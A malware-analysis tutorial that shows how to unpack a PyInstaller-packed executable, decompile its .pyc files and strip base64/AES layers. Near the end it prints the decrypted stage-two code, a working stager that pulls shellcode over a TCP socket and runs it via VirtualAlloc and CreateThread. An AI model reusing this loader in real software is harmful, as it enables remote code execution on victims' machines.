De-obfuscating PyInstaller Malware

the image above depicts the pyinstaller icon, which can be used to recognise exe files packaged with pyinstaller

What is pyinstaller?

PyInstaller is a tool used to package Python scripts and all their required libraries into a single exe, which can be launched without needing to install Python or any other requirements. It does this by bundling a Python DLL inside the exe, along with compiled versions of the Python files and libraries.

Malware authors sometimes use this as a method of obfuscation, or to try to avoid detection by AV.

However, these exe files, or "PE files", can be converted back into something very close to their original source code for analysis, and that's what we'll be doing today.

Recognising pyinstaller packed PE files

  • Most PE files packed with pyinstaller will have the icon shown above
  • Run floss or strings on your PE file and you will see references to python27.dll, or python[xx].dll where xx is a python version number. There will also be references to at least one .pyd, .pyz, or .pyc file. Additionally you might see strings like 'Error extracting' or 'Failed to execute script'
Despite containing a Python DLL, as well as a number of compressed resources, these objects won't necessarily show up in many of your favourite tools. But chuck your payload into a text editor, scroll to the bottom, and sure enough you'll find references to Python.
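The string checks above can be sketched as a small script. This is only a rough triage helper, not a definitive detector: the function name pyinstaller_indicators is made up for illustration, and the magic bytes are an assumption based on the archive marker used by current PyInstaller releases (modified or very old builds may differ).

```python
import re

# Assumption: marker bytes found in the archive that PyInstaller appends
# to the executable. Custom or very old builds may use something else.
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"

# Matches embedded interpreter names such as python27.dll or python310.dll.
PYTHON_DLL_RE = re.compile(rb"python(\d{2,3})\.dll", re.IGNORECASE)

# Error messages mentioned above that the PyInstaller bootloader carries.
ERROR_STRINGS = (b"Error extracting", b"Failed to execute script")


def pyinstaller_indicators(data: bytes) -> dict:
    """Return simple string-based hints that `data` is a PyInstaller bundle."""
    versions = sorted({m.group(1).decode() for m in PYTHON_DLL_RE.finditer(data)})
    return {
        "has_magic": PYINSTALLER_MAGIC in data,
        "python_dlls": versions,
        "has_error_strings": any(s in data for s in ERROR_STRINGS),
    }
```

To try it on a sample, read the file in binary mode and pass the bytes in, for example pyinstaller_indicators(open("payload.exe", "rb").read()). None of these hints is conclusive on its own, but several together are a strong signal.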


Your first step is going to be to extract the contents of your PyInstaller-packaged exe, which are compressed with the zlib library and appended to the end of the executable as an archive. We could probably create a small script to do this for us, but luckily one already exists.

The tool referenced above, pyinstxtractor, can be installed using pip install pyinstxtractor, which worked for me. However, I was not able to call the extractor from the command line like I expected, so I ended up having to git clone the repository and run the script from that folder.

The script can be run with the simple syntax python pyinstxtractor.py your_file.exe and, if successful, will spit out a folder named your_file.exe_extracted


To show how this works, I'll perform the process on some python based malware packed with pyinstaller (which I've cleverly named 'payload.exe')

the script can be run easily from the command line with no additional arguments
the output folder from our tool

Our extracted folder contains a number of items, including DLL libraries, pyd libraries, and manifest files. However, all we care about are the .pyc files.
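If the extracted folder is large, a few lines of Python can pick out just the files we care about. This is a minimal sketch; find_pyc_files is a hypothetical helper name, and it assumes the interesting files carry a .pyc extension.

```python
from pathlib import Path


def find_pyc_files(extracted_dir: str) -> list:
    """Return every .pyc file under the extraction folder, sorted by path."""
    root = Path(extracted_dir)
    return sorted(p for p in root.rglob("*.pyc") if p.is_file())
```

For example, find_pyc_files("payload.exe_extracted") would return a list of Path objects that can then be fed to a decompiler one at a time.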



You may notice that these pyc files that you've extracted are not human readable when you open them up in a code editor

pyc files when viewed in a text editor

That's because these are compiled Python files, the same kind Python caches in __pycache__ folders. They hold bytecode: essentially our Python stored in the state between source code and execution in the interpreter. We don't need to know exactly how this works, but we do need to know how to "decompile" these back into human-readable Python code.

Uncompyle6 can be installed with a simple pip install uncompyle6 and, once installed, can be used from the command line via the uncompyle6 command

Important things to note when using this tool:

  • You must run uncompyle6 with the version of python that the pyc file was compiled with, or you may experience errors
for example, running the tool against our sample using python 3.10 gives us a 'bad marshal data' error, as this payload was made with a much older version of python
  • You can run this against your whole extracted folder and output the decompiled files using this command uncompyle6 -r extracted_folder -o output_folder
  • You can use --verify to verify each decompilation attempt. Unverified or failed attempts will be outputted with a _unverified or _failed suffix
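To work out which Python version a pyc file needs before decompiling, you can read the magic number from the first bytes of the file. The sketch below assumes a standard pyc header (a 2-byte little-endian number followed by \r\n); the helper names and the small lookup table are illustrative only, and the table lists just a handful of versions.

```python
import struct

# Assumption: a small hand-picked subset of CPython magic numbers.
# Anything not listed here is reported as "unknown".
KNOWN_MAGIC = {
    62211: "2.7",
    3394: "3.7",
    3413: "3.8",
    3425: "3.9",
    3439: "3.10",
}


def pyc_magic(header: bytes) -> int:
    """Return the magic number stored in the first two bytes of a pyc header."""
    if len(header) < 4 or header[2:4] != b"\r\n":
        raise ValueError("this does not look like a .pyc header")
    return struct.unpack("<H", header[:2])[0]


def guess_python_version(header: bytes) -> str:
    """Map the magic number to a Python version, if it is in our small table."""
    return KNOWN_MAGIC.get(pyc_magic(header), "unknown")
```

In practice you would pass in the first four bytes of the file, for example guess_python_version(open("some_file.pyc", "rb").read(4)), and then run uncompyle6 under a matching interpreter.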

Running the tool

I'll be using our extracted files as an example of how this tool works. See uncompyle6 in action below, running under Python 2.7 in order to decompile a pyc file compiled with Python 2.7 (magic number 62211)


Deobfuscating our payload

For the purposes of explaining how to extract PyInstaller malware, we're done, but as an example of what Python malware like this may look like, we can deobfuscate our decompiled code

from Crypto.Cipher import AES as mEujv
from base64 import b64decode as ZCwNK

We can see that our payload imports the b64decode function from the base64 python library and renames it to ZCwNK

The payload then uses this function to decode a base64 string and passes it into an exec() function, which executes the decoded text as more python

To see what code is being executed, we can use a simple trick: replacing our exec() call with a print() call instead. This will print our decoded Python code to the screen instead of executing it.

We can tidy the output up by adding a .decode("utf-8", "ignore") to convert the byte array that b64decode spits out into a utf-8 string. This won't change the output much but it will make it a bit more human readable
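Here is the same trick on a harmless stand-in, so it can be tried safely. This is a sketch in Python 3; the encoded string and the reveal_stage helper are made up for illustration and are not taken from the sample.

```python
from base64 import b64decode, b64encode

# Harmless stand-in for an obfuscated stage (not from the real sample).
hidden_source = 'print("hello from stage two")'
encoded_stage = b64encode(hidden_source.encode("utf-8"))


def reveal_stage(encoded: bytes) -> str:
    """Decode a base64-wrapped stage and return it as text, without running it."""
    return b64decode(encoded).decode("utf-8", "ignore")


# Where the malware would call exec(...), we print the decoded text instead.
print(reveal_stage(encoded_stage))
```

The important part is that nothing from the decoded stage is ever passed to exec(), so the next layer can be read without being run.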

from Crypto.Cipher import AES as mEujv
from base64 import b64decode as ZCwNK

We can see that our output is more of the same, but this time, instead of just decoding some base64, we have an added layer of obfuscation: the output of the base64 decode function is passed into a .decrypt() function call. Going back to our original script, we can see that the AES utility is actually imported from Crypto.Cipher as mEujv

This time, we can simply replace our exec() with a print() and add our trusty .decode("utf-8", "ignore") to print out the result of this decoding/decryption. However, we also need to move the .rstrip("{") to the end of our decryption output, and add a .decode("utf-8", "ignore") in between to make it work.

print(mEujv.new("dli8rK(n7&^@|cxC#JzvWHliH9dp2OB9").decrypt(ZCwNK("2RhowUdCq9o8TvWpEEh6IrTjadgCaVAQqvrZPQnwSJLnzFHC0TFzNf5ULyqBdqscGtgQtRp9ALM3NNGLFgeAPUXZaXRzMdDq9G0c388Z9fKOxI/1641/+HMzb5mgaliMJMMqlx2lxf0RXjX5GU5vcLJcwnEJcd03zcpuuXzih1soTbGC6Uh/N049MJ14yNs401uQoMFujfRTuqiz4d+e3wG6VUBoYkz7IazE7XAyOxEziatTuJ9DogrSvUPqTzLo2PcNoIG+pbxfpSp1a9i8fCHOfmjOwwwCNvv/OBjy6q4Jt2Cc8CDdFGeQ5a/d8dEyeNEXo65hHGlsg/2vuuEQTh1eNIVlrFlF98z0RL+aegfZZKlp2C/2n2e0fgaumINJMBJ6hPpHwovAIFyClyHiXYxHMZuAv1WZ9QhaNW1CK/VCIceQ+6k3uXA1mnWVen56uCPhzWpYCreGC847K/KfJHkQvbMgoJqx5th2naJxIrT8XcAmXdY1nOtEnADueY+dT+ahMvNEO9G9KhZkeI710/hMFWgXVQAfSAfAHs+6eN3G+qr4wTVSuVdQVKFVuLxFbacMl2081C7qbv83yI+c6m1jcUdfdtgXdGv4WB202TZjXyKxybgHVBBVVZO+1qzwXgmK9yW2jQaqK2PrAQMVyZCwtIc7R9Y20ShrwFlyS+cKNJYFVEgxeFVe3GiKMKl+1K1m/0A9fswDnvecjGG3Mroc1kAbDql1BksBFtnxAEN9zweOtmUorp71ewJ8+utPLN6j8XcammpEf6XocISHpbOXS+2EFUixyLHYqyekY+t323Oi8EnM3phz/W9GhcM8lWw2O5gyHD4p+Fp17VwSgSIIr8ppFnw8E2YMkPQUygGeZdO7rFBqwCJ3Pj/1mmhP70EkRBfq6wzVIw4DwoP68xHt5zKkHsA4Xrj3byOJxqbO5POJ/qtKOOwK428dWVnoZUw5IMv7aIawRulNU9DTxZGJ0dJh58GGD57SCVOcQr6FRnVrDCTE8RAVO77OvsD1Ty/+GSywnaiyRY0JPVQLagaiW9f+Ugm0Bkq423l0q1qb6+R8uvaMXp7ShP+Fm/n+5kYG/6Wt8dAl0riR6Zpe3HJS9RIinPi3XyVrwPXnGGjlP2Q5qP8ILyu8rR4UrwQQjj3dhAs7ZZ5Ml4IwuWalscKec0EfsEF6QzKG5/pzxX2FRnVrDCTE8RAVO77OvsD1q++L8hIpthUcZfvnvGEBCrpa+rdHS/iCij8CNQ+EefxFOjTyV+EznHtwEcJn2afMY6HImXkbjvAIVX+QU6rAkaF1cr4n/KSYeHnAdgt4NNqHe5yyTBfxYRaSYVbtC1Hqml0zf//GRZLsxl7mINh6hs7k84n+q0o47Arjbx1ZWehnYlghISe0tPcPOu4dhAAyjj3dhAs7ZZ5Ml4IwuWalsXmEbfADlvlwnS3usMoI8kikz4pS4qGyvrP+g3IC+xW8AwD0uRbB6trRp0dDtnlys+q7vPuXGl0kA7lxi7+bxl/1Qmec8R93q8hBWUa4IoDXbtKCYO2hhQlkA5JPhPYeBtHsnd7FDpo76rqRKdcpQKfFZdh++jzQbqPRZltyuaj5xWXYfvo80G6j0WZbcrmo+b/59d+btzjbgtvnDgZubB74Zzyw1ipekyKIZXLP6/ODUjs644jnIvxfKdvqmrr7RlI7OuOI5yL8Xynb6pq6+0a9Rns0Ut3cMxhf52TG/Beq9YGadLUbH+W47QGiA1Je14iFFI1ijE/MNw4BfKriKcN7jWV1TukDizUcJC1R2F7A8ppkbx2x/70EOmPkWXgGUtYqXoXB8t61dPxE16L2rgSRXhEOm26rGynVtp/ADkAiwmu3I77qL0aqGLTPeZ/nvcqIOKRD8YTE/uV3I6A6px5P/S9FuVzTpaNq7TFW/k7A")).decode("utf-8", "ignore").rstrip('{'))

This will print out the following code:

mxaatTo, skZlYlWgCv = None, None
def DqGPRjpMU():
	try:
		global skZlYlWgCv
		skZlYlWgCv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		skZlYlWgCv.connect(('', 53))
		JvXlwZZDAq = struct.pack('<i', skZlYlWgCv.fileno())
		l = struct.unpack('<i', str(skZlYlWgCv.recv(4)))[0]
		gkZJOhEcng = "     "
		while len(gkZJOhEcng) < l: gkZJOhEcng += skZlYlWgCv.recv(l)
		CYdhMbqx = ctypes.create_string_buffer(gkZJOhEcng, len(gkZJOhEcng))
		CYdhMbqx[0] = binascii.unhexlify('BF')
		for i in xrange(4): CYdhMbqx[i+1] = JvXlwZZDAq[i]
		return CYdhMbqx
	except: return None
def JumwoufCojnuNhJ(SwEfMXULIc):
	if SwEfMXULIc != None:
		hHgmsQXisWqtJQD = bytearray(SwEfMXULIc)
		BuaqjQwrhsINzMJ = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(hHgmsQXisWqtJQD)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
		ctypes.windll.kernel32.VirtualLock(ctypes.c_int(BuaqjQwrhsINzMJ), ctypes.c_int(len(hHgmsQXisWqtJQD)))
		ObnnzmHpSzgpY = (ctypes.c_char * len(hHgmsQXisWqtJQD)).from_buffer(hHgmsQXisWqtJQD)
		ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(BuaqjQwrhsINzMJ), ObnnzmHpSzgpY, ctypes.c_int(len(hHgmsQXisWqtJQD)))
		ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(BuaqjQwrhsINzMJ),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
mxaatTo = DqGPRjpMU()

This looks more like the meat of our malware, with references to the Windows API littered throughout, as well as calls to socket, which allows low level network functionality.

If we break this malware down line by line we can see that it does the following:

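  • Creates a function named DqGPRjpMU that opens a TCP socket and connects to a local network address over port 53, reads a 4-byte length followed by that much data, overwrites the first five bytes of the buffer with the byte 0xBF and the socket's file descriptor (on x86 this encodes mov edi, <socket handle>, so the received code can reuse the open connection), then returns the result
  • Creates a function named JumwoufCojnuNhJ that allocates executable memory using the Windows API (VirtualAlloc with 0x3000, which is MEM_COMMIT | MEM_RESERVE, and 0x40, which is PAGE_EXECUTE_READWRITE), copies whatever data is given to it into that memory, and executes it as shellcode using kernel32.CreateThread()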
  • Passes the output of the first function into the second, to receive data from an internal IP, and then launch the data received as shellcode
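The framing used by the first function (a 4-byte little-endian length, then the data itself) can be illustrated with a harmless parser. This is a simplified sketch for analysts, for example when inspecting captured traffic; read_stage and describe_prefix are hypothetical helper names, and the parser works on any file-like object rather than a live socket.

```python
import io
import struct


def read_stage(stream) -> bytes:
    """Read a 4-byte little-endian length, then that many bytes of data."""
    (length,) = struct.unpack("<i", stream.read(4))
    if length < 0:
        raise ValueError("negative length in header")
    payload = b""
    while len(payload) < length:
        chunk = stream.read(length - len(payload))
        if not chunk:
            raise EOFError("stream ended before the full payload arrived")
        payload += chunk
    return payload


def describe_prefix(prefix: bytes) -> dict:
    """Interpret the five bytes the sample writes over the start of its buffer."""
    opcode, handle = struct.unpack("<Bi", prefix[:5])
    return {"opcode": hex(opcode), "socket_handle": handle}
```

For instance, read_stage(io.BytesIO(captured_bytes)) would return only the data that follows the length header, which is the part the sample goes on to treat as shellcode.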

Therefore, we can make a fair assumption that this is a beacon of sorts, that can receive and execute code from a command and control node (in this case another internal network location)